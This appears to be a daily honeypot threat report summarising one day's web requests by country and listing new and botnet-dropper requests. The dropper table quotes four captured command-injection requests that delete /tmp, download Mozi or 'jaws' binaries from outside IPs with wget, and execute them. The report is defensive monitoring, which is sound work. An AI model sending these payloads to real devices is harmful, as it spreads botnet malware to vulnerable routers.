Skip to main content
  1. Daily-Posts/

Report: 2025-04-19

·395 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-19
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 25 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1522 requests were recorded during the day, originating from 4 different countries, with a peak of 256 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
221.15.21.58GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://221.15.21.58:59826/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
81.108.237.134GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1
27.37.225.20427;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
5.232.197.153GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://2.181.231.51:53192/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1211\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
1271GET /LoTM HTTP/1.1
1341GET /nmaplowercheck1745061921 HTTP/1.1
1481GET /NmapUpperCheck1745061921 HTTP/1.1
1521GET /Nmap/folder/check1745061921 HTTP/1.1
1631GET /Shq0 HTTP/1.1
1751GET /api/bin/440393?time=1745038592926894374 HTTP/1.1
1761GET /config/index?time=1745036279894552763 HTTP/1.1
1771POST /api/user/binLookup?time=1745035243131334900 HTTP/1.1
1781GET /api/bin/440393?time=1745035242484225653 HTTP/1.1
1791GET /config/index?time=1745034571326795697 HTTP/1.1
2231\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
2771GET /BgJi HTTP/1.1
2831POST /api/user/binLookup?time=1745042000504518878 HTTP/1.1
2841GET /api/bin/440393?time=1745042000006159705 HTTP/1.1
3001POST /api/user/binLookup?time=1745038834035574055 HTTP/1.1
3011GET /api/bin/440393?time=1745038833652444934 HTTP/1.1
3041GET /config/index?time=1745036375245076012 HTTP/1.1
3071\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
3221GET /config/index?time=1745038896988933583 HTTP/1.1
3241POST /api/user/binLookup?time=1745036232541860845 HTTP/1.1
3251GET /api/bin/440393?time=1745036232049909373 HTTP/1.1
3261GET /config/index?time=1745035232450715863 HTTP/1.1
3331GET /mtC8 HTTP/1.1
3361GET /oM7i HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0256GB
1220US
2182SC
3153DE
4105NL
593HK
679SE
775CN
874PL
971LT
1061CA
1127JP
1215ID
1313KR
1413SG
1512BG
1610VN
177FR
187UA
196IT
206BE
216RU
225IN
234GE
244AU
254TR
263AO
272AR
282AL
292TW
301MC
311IR
321TH
331DO
341PT

Related

Report: 2025-04-18
·482 words
Repport Daily
Report: 2025-04-17
·410 words
Repport Daily
Report: 2025-04-16
·4764 words
Repport Daily